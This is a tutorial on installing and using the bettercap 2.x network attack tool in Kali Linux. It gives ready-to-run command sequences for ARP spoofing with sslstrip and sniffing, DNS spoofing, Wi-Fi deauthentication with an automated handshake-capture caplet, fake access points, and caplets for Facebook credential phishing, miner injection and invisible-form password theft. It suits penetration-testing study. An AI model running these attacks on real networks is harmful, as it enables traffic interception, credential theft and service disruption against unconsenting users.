bettercap 2.x: how to install and use in Kali Linux

Difference between bettercap 2 and bettercap 1.6

At the end of February 2018, bettercap 2 was released and since then this version is actively developing, new functions are added to it. bettercap 1.6 is deprecated and no longer supported.

In the latest versions of bettercap, there are a lot of changes: the program was re-written in another programming language, instead of Ruby, using Go. Thanks to the change in language and other methods, productivity increased dramatically, optimized CPU and memory usage.

The model of interaction with the program has changed: before it was a command line utility, various options were used while launching. A new version can also be run in a non-interactive mode, using options, but now an interactive mode is available, as well as an API.

Even the purpose of the program has changed: it used to be a modular platform for implementing complex man-in-the-middle attacks, now, in addition to supporting man-in-the-middle attacks, there is also functionality for network monitoring, 802.11 and BLE wireless networks monitoring and attacking .

The program functions became more atomized, for example, to launch the most common middle-man attack, consisting of ARP spoofing and sniffing, now you need to enter several commands (there was only one option before). This increases the flexibility of program usage, but at the same time complicates usage. To automate the work of the program and simplify the usage, ones can use caplets that control the work of bettercap and its modules. Examples of caplets are collected in the repository https://github.com/bettercap/caplets.

And this is not even all the changes! It's worth mentioning that native Go plug-ins are supported (via the package.proxy module), some modules support the JavaScript scripting language for data manipulating and controlling the behavior of the program, and the program itself and its caplets support native system commands.

In general, it's just another program, in which everything is new.

How to install bettercap 2 in Kali Linux

In the Kali Linux repositories, there is bettercap already, but at the time of writing there is an outdated 1.6.2 version. To check which version of bettercap is currently available for installation from official repositories, run:

1	`apt-cache show bettercap \|` `grep` `'Version: '`

If there is version 2.x, then you just need to install it:

1	`sudo` `apt` `install` `bettercap`

Download and install the latest version of bettercap

Remove the outdated version of bettercap if it was installed earlier:

sudo apt remove bettercap
sudo rm /usr/local/bin/bettercap

Fix for an already installed library:

ln -s /usr/lib/x86_64-linux-gnu/libpcap.so.1.8.1 /usr/lib/x86_64-linux-gnu/libpcap.so.1

Download the archive with the binary file of bettercap latest version:

wget "https://github.com`curl -s https://github.com/bettercap/bettercap/releases | grep -E -o '/bettercap/bettercap/releases/download/v[0-9.]+/bettercap_linux_amd64_(|v)[0-9.]+zip' | head -n 1`"

We unpack, move, clean and check:

unzip bettercap_linux_amd64_*zip
sudo mv bettercap /usr/local/bin/
rm bettercap_linux_amd64_*
bettercap -h

Installing bettercap from the source code will be discussed at the end of the article.

bettercap usage guide

Now the main functional feature of bettercap is not only the man in a middle attacks. Thanks to caplets and scripts, it is possible to implement a variety of phishing attacks and attacks based on data manipulation, the starting point of which is a man-in-the-middle attack. For this reason, it's not easy to write exhaustive manual for bettercap.

To approximate the possibilities of the program, read the documentation, and also get acquainted with the repository of caplets: many of them have comments in the source code that help to understand what the program will do exactly.

In the following, very simple examples of starting bettercap will be considered. Let's start with using an interactive session, to do this, run bettercap:

1	`sudo` `bettercap`

Local network monitoring

To list the detected hosts on the local network, type:

1	`net.show`

This is a passive method of monitoring, since the search for hosts is based on reading of the ARP cache.

To exit the program, type q or press CTRL+z.

And the net.probe module actively searches for hosts, sending dummy UDP packets to every possible IP in the subnet. To enable this module:

1	`net.probe on`

We look at the detected hosts:

1	`net.show`

This is an active method since network analyzers will see that a computer with bettercap massively sends packets.

With bettercap, you can continuously monitor the network status by obtaining on-screen data in real-time, for this, run sequentially:

net.probe on
ticker on

The first net.probe on command, as we found out a little earlier, enable an active search for hosts, and the second command is used to execute a given set of commands periodically. Since we did not specify which commands to execute, the default executed commands are clear; net.show, the result is an interesting effect: in the background it is constantly searching for hosts, and information is displayed on the screen in real time.

Interactive and non-interactive mode. The -eval and -caplet options. Caplets

If you are uncomfortable to run bettercap interactively every time, you can use the -eval option, after which specify the commands that you want to run. For example, the previous example is equivalent to this:

1	`sudo` `bettercap -eval` `"net.probe on; ticker on"`

Right in the interactive session, bettercap, you can execute the system commands. For example, the following set of commands checks if there is a connection to the WAN:

ping -c 1 google.com >/dev/null 2>&1 && echo "Connected" || echo "Not connected"

This same command (set of commands) can be performed right in the interactive session, just before the first command put an exclamation mark:

!ping -c 1 google.com >/dev/null 2>&1 && echo "Connected" || echo "Not connected"

Now we will monitor local network and Internet access availability. We launch an active search for local hosts:

1	`net.probe on`

We set the value of the ticker.commands variable, there are now three commands: two are already known bettercap internal commands (these are clear; net.show;) and one more is the set of system commands:

set ticker.commands 'clear; net.show; !ping -c 1 google.com >/dev/null 2>&1 && echo "Connected" || echo "Not connected"'

If desired, you can increase the period to three seconds (the default is one second):

1	`set` `ticker.period 3`

Run the task cyclically:

1	`ticker on`

In the results of execution, pay attention to the new ‘Connected’ line:

Using the -eval option, you can run this all in this way:

sudo bettercap -eval 'net.probe on; set ticker.commands "clear; net.show; !ping -c 1 google.com >/dev/null 2>&1 && echo "Connected" || echo "Not connected""; set ticker.period 3; ticker on'

But in addition to the -eval option, there is also the -caplet option, which also allows you to run the program with the specified commands.

Let's create our first caplet. To do this, create a text file named netmon.cap (you can choose any name):

1	`gedit netmon.cap`

And just copy all our commands to it, which we entered in the interactive session, we should get the following file:

net.probe on
# Note the absence of quotes in this example and the quotes in the previous ones:
set ticker.commands clear; net.show; !ping -c 1 google.com >/dev/null 2>&1 && echo "Connected" || echo "Not connected"
set ticker.period 3
ticker on

Now run bettercap with the -caplet option, after which we'll specify the path to the file with a caplet:

1	`sudo` `bettercap -caplet ./netmon.cap`

How to run spoofing and sniffing in bettercap

Let's start with the launch of ARP spoofing:

1	`arp.spoof on`

By default, the attack is performed on the entire subnet, so if ARP spoofing works poorly, set the IP targets using the arp.spoof.targets variable. Its value can be one IP or several IPs separated by a comma, for example:

1	`set` `arp.spoof.targets 192.168.0.90`

To see all available host in your local network:

1	`net.show`

Values of variables must be set before the corresponding module is run. If you need to change the value of a variable of an already running module, stop the module, set the new value and restart the module, for example:

arp.spoof off
set arp.spoof.targets 192.168.0.90
arp.spoof on

For the sniffer, if desired, you can reduce the level of verbality:

1	`set` `net.sniff.verbose` `false`

If you want to save network packets captured during sniffing to a file, specify the file for saving data as the value of net.sniff.output

1	`set` `net.sniff.output` `/tmp/captured.pcap`

Run the sniffer:

1	`net.sniff on`

Transparent HTTP proxy

To analyze HTTP traffic, you must enable http.proxy. If it is used in conjunction with spoofing, all HTTP traffic will be redirected to it and, if necessary, it will automatically handle port forwarding.

If you want to use sslstrip, you must change the value of the http.proxy.sslstrip variable, which is set to false by default:

1	`set` `http.proxy.sslstrip` `true`

To enable transparent HTTP proxy:

1	`http.proxy on`

A full list of commands for attacking the local IP 192.168.0.90, as a result, continuous ARP spoofing of this address will be performed, which will cause the traffic to be redirected to the attacker's machine, to a transparent HTTP proxy, where, if possible, downgrade from HTTPS to HTTP will be performed using sslstrip, the verbality of the sniffer is lowered to show really important data:

set http.proxy.sslstrip true
set net.sniff.verbose false
set arp.spoof.targets 192.168.0.90
arp.spoof on
http.proxy on
net.sniff on

To attack the whole subnet, skip the set arp.spoof.targets IP line.

DNS spoofing in bettercap

The DNS query is replaced by the dns.spoof module. You can configure it before starting it.

By default, all domains will be spoofed, if you want to change this, then set them by the value of the dns.spoof.domains variable as comma separated list. For example, I want to spoof only two domains suip.biz and mi-al.ru, then:

1	`set` `dns.spoof.domains suip.biz, mi-al.ru`

By default, DNS server send IP pointing to the interface address of the machine on which bettercap is launched. The IP address changes through the dns.spoof.address variable:

1	`set` `dns.spoof.address desired_IP`

This module will only respond to requests that target the local PC; to respond to everything, set the value of the dns.spoof.all variable to true:

1	`set` `dns.spoof.all` `true`

To run the module:

1	`dns.spoof on`

Built-in web server in bettercap

To process requests to the web server, you can use the server installed on your system, for example, Kali Linux has Apache and you just have to run it:

1	`systemctl start apache2`

Bettercap also has a built-in simple web server that can render HTML pages and other static files, such as JavaScript, CSS, pictures, etc.

You must specify the address of the server folder by changing the value of the http.server.path variable :

1	`set` `http.server.path` `/path/to/folder`

To start the web server (the system server, for example, Apache, should be stopped, because there may be a conflict due to the fact that different programs try to listen on the same port):

1	`http.server on`

Wi-Fi networks monitoring

This is a new bettercap feature. By the way, Bluetooth Low Energy support has also been added.

To work with Wi-Fi, you need to use the -iface option, after which you can specify the name of the wireless interface:

1	`sudo` `bettercap -iface wlan0`

In the event that you will have errors raised by the previous command, for example:

Can't restore interface wlan0 wireless mode (SIOCSIWMODE failed: Bad file descriptor).
Please adjust manually.

Then quit bettercap and manually set the wireless interface to monitor mode. For example, as follows:

sudo ip link set wlan0 down
sudo iw wlan0 set monitor control
sudo ip link set wlan0 up

Now that the wireless interface is in monitor mode, run bettercap again and enter the command:

1	`wifi.recon on`

It starts Wi-Fi devices detection:

If you want to limit to monitoring only certain channels, then execute a command like this (it sets the jumping only on the first three channels):

1	`wifi.recon.channel 1,2,3`

By the way, if later you need to clear the list of channels (make the program jumps on all channels), then the following command is used for this:

1	`wifi.recon.channel` `clear`

To display the results, type:

1	`wifi.show`

The next set of commands will start gathering information about Wi-Fi devices, will display a table with a full list of detected access points, as well as a list of the last 20 detections:

set ticker.commands 'clear; wifi.show; net.show; events.show 20'
wifi.recon on
ticker on

Capture handshakes in bettercap

Yes, bettercap now knows how to do this, and also knows how to perform the deauthentication attack.

If we want to capture a handshake from a specific access point, then we need to know the channel on which it works. This is enough if we are going to passively wait for the client to connect/reconnect to the AP.

To perform the deauthentication attack, we need to know the BSSID of the access point (in this case, the attack will be performed against all clients) or the BSSID of the client (in this case, the attack will be performed against one client).

Let's start with the sniffer configuration. Let's make it verbal:

1	`set` `net.sniff.verbose` `true`

Set up the filter for the handshake frames:

1	`set` `net.sniff.filter ether proto 0x888e`

We set up saving the received data to the wpa.pcap file:

1	`set` `net.sniff.output` `/root/wpa.pcap`

Run the sniffer:

1	`net.sniff on`

The Sniffer is run the same way every time. The further values of the variables depend on the target being attacked.

The target I want to attack is working on channel 8, so I set the channel:

1	`wifi.recon.channel 8`

Run the network analysis:

1	`wifi.recon on`

I'm interested in AP with BSSID 50:46:5d:6e:8c:20, I can enable the filter:

1	`wifi.recon 50:46:5d:6e:8c:20`

The following two commands are optional, they will periodically clear the screen and display a table with the seen base stations (you can see if there are any clients at the attacked Access Points), if you do not want to, skip these commands:

set 'ticker.commands clear; wifi.show'
ticker on

We proceed to deauthentication. The attack can be performed in two forms:

1	`wifi.deauth AP-BSSID`

or:

1	`wifi.deauth CLIENT-BSSID`

In the first case, all clients will be deauthenticated, in the second case, only a specified client will be deauthenticated. I want to deauthenticate all access point clients, then my command:

1	`wifi.deauth 50:46:5d:6e:8c:20`

A file with captured frames can be opened for verification in Wireshark:

To filter out handshakes, use the filter:

1	`llc.type == 0x888e`

Or the filter:

eapol

In addition to bettercap, there are already enough programs that can capture handshakes. The advantage of bettercap is that we can automate the process.

For example, the following command checks the capture file and displays information about the handshake(s) if they are found there:

1	`tshark -r` `/root/wpa.pcap -R` `'eapol'` `-2 2>/dev/null`

A little more verbal command:

if [ "`tshark -r /root/wpa.pcap -R 'eapol' -2 2>/dev/null`" ]; then echo "Got handshake!"; else echo "Nothing"; fi;

We need the previous command to write a caplet, which will work according to the following logic:

when started, launches a sniffer to capture a handshake
launches deauthentication attack
checks whether the handshake was captured
if the handshake is captured - shutdown bettercap
if the handshake is not captured, return to step 2

For this, I create a file HS_capture_50465d6e8c20.cap with the following contents:

# Setting up the sniffer
set net.sniff.verbose true
set net.sniff.filter ether proto 0x888e
set net.sniff.output /root/wpa.pcap
net.sniff on
 
# Configuring and starting the analysis of wireless networks; channel and BSSID replace with your values
wifi.recon.channel 8
wifi.recon on
sleep 20
wifi.recon 50:46:5d:6e:8c:20
 
# Performing the deauthentication attack, sleeping for 60 seconds, checking if a handshake was captured, 
# if yes, then quitting bettercap. 
# Note that if you changed the name of the file where the handshake is saved, you also need to change 
# it here - /root/wpa.pcap, and also replace BSSID with the attacked AP
set ticker.commands wifi.deauth 50:46:5d:6e:8c:20; sleep 60; !'if [ "`tshark -r /root/wpa.pcap -R 'eapol' -2 2>/dev/null`" ]; then echo "Got handshake! Quit."; sleep 1; pkill -1 bettercap; else echo "Yet not captured"; fi;'
# Period of the cycle - only one second is set here, because in the previous set of commands there is a sleep 60; 
# which sets the sleep for 60 seconds:
set ticker.period 1
# Run cyclic execution of commands
ticker on

Running bettercap

1	`sudo` `bettercap -iface wlan0 -caplet ./HS_capture_50465d6e8c20.cap`

The program will work until it grabs the handshake. But after grabbing a handshake, bettercap will finish its work and no longer bother network clients.

Creating a fake access point

Among the Wi-Fi functions, it is possible to create a fake access point with or without encryption.

Create a fake access point "Banana" with BSSID DE:AD:BE:EF:DE:AD on channel 5 without encryption:

set wifi.ap.ssid Banana
set wifi.ap.bssid DE:AD:BE:EF:DE:AD
set wifi.ap.channel 5
set wifi.ap.encryption false
wifi.recon on; wifi.ap

As you can see, there is a lot of options for automation and various combined attacks, including automated attacks based on social engineering.

Review of bettercap caplets

As already mentioned, the caplets are placed in the official repository. There are some very simple examples that automate several typical actions, and quite complex implementations of modern attacks.

BeEF hooking

BeEF is a platform for web browsers exportation. To start, you need to embed the JavsScript code in a web page. The beef-passive.cap and beef-active.cap do just that. The beef-inject.js file controls the insertion, so if you want to change the address or port of the Javscript file, you need to edit this file.

Before starting this attack, you need to start the BeEF service, or edit the caplets by adding the appropriate command.

The first caplet insert the JavsScript file passively, the second one is active, using traffic redirection from other hosts using ARP spoofing.

Miner injection

crypto-miner.cap inject the miner. You need to enter your own key by editing the crypto-miner.js file.

Replacing the uploaded file with the payload

This module lets you intercept very specific download requests and replaces with the payload of your choice. In order for a download to get intercepted:

1. the victim's user-agent string must match the downloadautopwn.useragent.x regexp value

2. the requested file must match one of the downloadautopwn.extensions.x file extensions you can find the downloadautopwn.devices in the caplets/download-autopwn/ folder (you can add your own)

The configuration is performed in download-autopwn.cap. In the pair is a download-autopwn.js file, which is NOT intended for implementation in the browser, it is used as a script for the http.proxy module (that is, it manages bettercap behavior and traffic manipulation).

If someone uploaded a payload:

Stealing Facebook passwords

The fb-phish.cap applet shows a fake Facebook login page on port 80, interrupts login attempts using http.proxy, prints credentials, and redirects the target to a real Facebook.

In the pair there is a fb-phish.js file, which is a script for the http.proxy module.

You need to take care of creating a fake login page and starting the server. In this you will be helped by the Makefile file with the instructions (if you have the caplet repository downloaded, at the Bash command line execute):

cd caplets/www/
make

Then in bettercap:

set http.server.address 0.0.0.0
set http.server.path caplets/www/www.facebook.com/
 
set http.proxy.script caplets/fb-phish.js
 
http.proxy on
http.server on

Collection of HTTP requests

Execute an ARP spoofing attack on the whole network (by default) or on a host (using -eval as described), intercept HTTP and HTTPS requests with the http.proxy and https.proxy modules and dump them using the http-req-dumsp.js proxy script.

Collection of logins and passwords with invisible forms

The essence of the attack is as follows: if on a web site you previously entered a login and password, then if there is a form on the page, the browser automatically fills in the data entered earlier. Firefox does this right away, Chrome requires any user interaction - for example, clicking anywhere on the web page. This form can be invisible. So, the attacker injects onto the site pages an invisible form into which the browser itself enters the login and password, the form transmits data to the attacker.

This is implemented in the login-man-abuse.cap caplet.

There is a demo page where you can see an example of the attack: enter any e-mail and password, then you will be transferred to another page that "guesses" what you entered earlier.

Redirect IPv4 DNS queries using DHCPv6 responses

Description of the attack: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/

The approximate essence is that in modern versions of Windows, the system is set to give preference to IPv6. The attacker responds with DHCPv6 messages, provides the link-local IPv6 address and specifies the attacker's host as the DNS server. Next, DNS spoofing attack is performed.

The attack is implemented in mitm6.cap.

Testing the http.proxy script

The proxy-script-test.cap plugin will help you test JavaScript script work. In the pair there is a proxy-script-test.js file.

Passwords sniffer

simple-passwords-sniffer.cap caplet is a really very simple example of data searching based on regular expression. It uses commands:

set net.sniff.regexp .*password=.+
set net.sniff.output passwords.cap

Changing the prompt of the interactive bettercap session

You can customize the prompt to which you enter commands. Including you can show in it useful information. An example with statistics output is contained in test-prompt-stats.cap.

Changing the contents of requested web pages

The web-override.cap caplet overwrites any loaded page with the one the attacker specified. The pair is the web-override.js file, this is the http.proxy module, and it describes the actions that are performed, for example, which page to display.

You can write your own caplets, if you want, you can offer interesting examples to add to the repository.

Installing bettercap from the source code in Kali Linux

You must install the Go compiler.

Open the .bashrc file in the user directory with any text editor:

1	`gedit ~/.bashrc`

And to create new environment variables, add the following lines to this file:

export GOPATH=/home/git/go
export GOROOT=/usr/local/src/go
export PATH=${PATH}:$GOROOT/bin:/home/git/go/bin

When you are ready, save your changes and close the file.

These changes will take effect after the reboot. Instead of restarting the computer, run:

1	`source` `~/.bashrc`

The following command automatically detects and downloads the latest version of the Go language files:

wget `curl -s https://golang.org/dl/ | grep -E -o 'https://[a-z0-9./]{5,}go[0-9.]{3,}linux-amd64.tar.gz' | head -n 1`

Extract the downloaded archive:

1	`tar` `zxf go*.linux-amd64.tar.gz`

Change the directory to $GOROOT, which we specified in ~/.bashrc.

1	`sudo` `mv` `go $GOROOT`

Install the packages necessary for compilation:

1	`sudo` `apt` `install` `bison byacc libpcap0.8-dev pkg-config libnetfilter-queue-dev`

Fix for an already installed library:

ln -s /usr/lib/x86_64-linux-gnu/libpcap.so.1.8.1 /usr/lib/x86_64-linux-gnu/libpcap.so.1

Download the source code, compile, install:

go get github.com/bettercap/bettercap
cd $GOPATH/src/github.com/bettercap/bettercap
make build && sudo make install

To update the program:

go get -u github.com/bettercap/bettercap
cd $GOPATH/src/github.com/bettercap/bettercap
make build && sudo make install

Conclusion

As you can see, bettercap from a simple and fun program for man-in-the middle attacks has grown into a powerful multifunctional tool.

To simplify routine activities, you can write small caplets in several commands: for example, to run sniffing on a local network, or to collect information about Wi-Fi networks.

C0NTRA - A Strand of Consciousness

Tuesday, January 23, 2024

Miloserdev Bettercap